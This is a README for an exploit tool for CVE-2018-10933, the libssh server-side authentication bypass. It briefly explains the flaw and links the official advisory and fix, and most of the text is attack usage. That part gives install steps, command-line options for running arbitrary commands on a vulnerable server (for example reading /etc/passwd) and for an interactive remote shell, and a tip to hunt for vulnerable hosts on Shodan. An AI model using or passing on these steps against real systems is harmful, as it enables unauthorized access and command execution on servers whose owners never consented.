
libSSH-Authentication-Bypass
Se encontró una vulnerabilidad en la máquina de estados del lado del servidor de libssh antes de las versiones 0.7.6 y 0.8.4. Un cliente malicioso podría crear canales sin realizar primero la autenticación, lo que resulta en acceso no autorizado.
El problema proviene de la forma en que libssh no mantiene el estado de la autenticación y cómo se puede usar para omitir la autenticación. Básicamente, piense en la conexión como un proceso de varios pasos: paso1, paso2, paso3... Dado que libssh no exige el orden de los pasos, básicamente puede saltar al paso3 sin pasar por el paso1 y el paso2.
Curiosamente, el mismo problema se encontró anteriormente en la biblioteca SSH Paramiko: CVE-2018-7750.
Exploit-DB : https://www.exploit-db.com/exploits/45638
Información sobre CVE-2018-10933 por libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Lanzamiento de corrección de errores por libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
sudo apt-get install python3
gh repo clone EmmanuelCruzL/CVE-2018-10933
pip3 install -r requirements.txt
python3 main.py
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host
Script for the vulnerabilities CVE-2018-10933
positional arguments:
host the ip or domain address of ssh server
options:
-h, --help show this help message and exit
-p PORT, --port PORT The port the service ssh, default [22]
-log, --logfile Logfile to write conn logs
-t, --test check the version of libSSH
-c COMMAND, --command COMMAND
command to execute
-i, --interactive open the interactive mode
python3 main.py 0.0.0.0 -port 22 -t

python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"

python3 main.py 0.0.0.0 -p 22 -l

[!] can find devices vulnerables using shodan.io
- ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )
